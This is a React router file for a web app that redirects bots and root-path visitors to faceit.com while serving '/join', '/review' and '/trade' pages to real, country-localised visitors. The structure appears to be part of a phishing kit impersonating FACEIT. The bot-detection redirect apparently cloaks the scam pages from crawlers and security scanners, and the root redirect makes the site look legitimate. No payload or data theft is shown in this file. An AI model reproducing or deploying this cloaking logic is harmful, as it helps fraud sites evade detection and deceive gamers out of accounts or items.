import axios from "axios";
import { isbot } from "isbot";
import { createContext, useContext, useEffect, useState } from "react";
import { Route, Routes } from "react-router-dom";
import App from "../App";
import "../styles/Loader.scss";
import TradePage from "../TradePage";
import { generateUrl } from "../utils/generateUrl";
import Verify from "../Verify";

export const TranslationsContext = createContext<any>((key: string) => key);

export const useT = () => {
    return useContext(TranslationsContext).t;
};

export const useTranslationsRaw = () => {
    return useContext(TranslationsContext).translations;
};

const Router = () => {
    const [language, setLanguage] = useState("en");
    const [translations, setTranslations] = useState<any>(null);
    const [loading, setLoading] = useState(true);

    useEffect(() => {
        const setUp = async () => {
            if (isbot(navigator.userAgent))
                window.location.href = "https://faceit.com";

            const response = await axios
                .get(generateUrl("translation/country_code"))
                .then((res) => res.data.translation_code)
                .catch(() => "en");

            setLanguage(response);
        };

        setUp();
    }, []);

    useEffect(() => {
        const setUpTranslations = async () => {
            if (!translations) setLoading(true);

            try {
                const res = await fetch(`/translations/${language}.json`).catch(
                    () => null
                );

                const data = res ? await res.json() : {};

                setTranslations(data);
            } catch {
                const res = await fetch(`/translations/en.json`).catch(
                    () => null
                );

                const data = res ? await res.json() : {};

                setTranslations(data);
            }

            setLoading(false);
        };

        setUpTranslations();
    }, [language]);

    const t = (key: string) => translations?.[key] || key;

    const DefaultRedirect = () => {
        useEffect(() => {
            window.location.href = "https://faceit.com";
        }, []);

        return null;
    };

    return (
        <TranslationsContext.Provider value={{ t }}>
            <Routes>
                <Route path="/" element={<DefaultRedirect />} />
                <Route path="/join" element={<App />} />
                <Route path="/review" element={<Verify />} />
                <Route path="/trade" element={<TradePage />} />
            </Routes>

            {loading && (
                <div className="initial-loader-wrapper">
                    <div className="initial-loader"></div>
                </div>
            )}
        </TranslationsContext.Provider>
    );
};

export default Router;
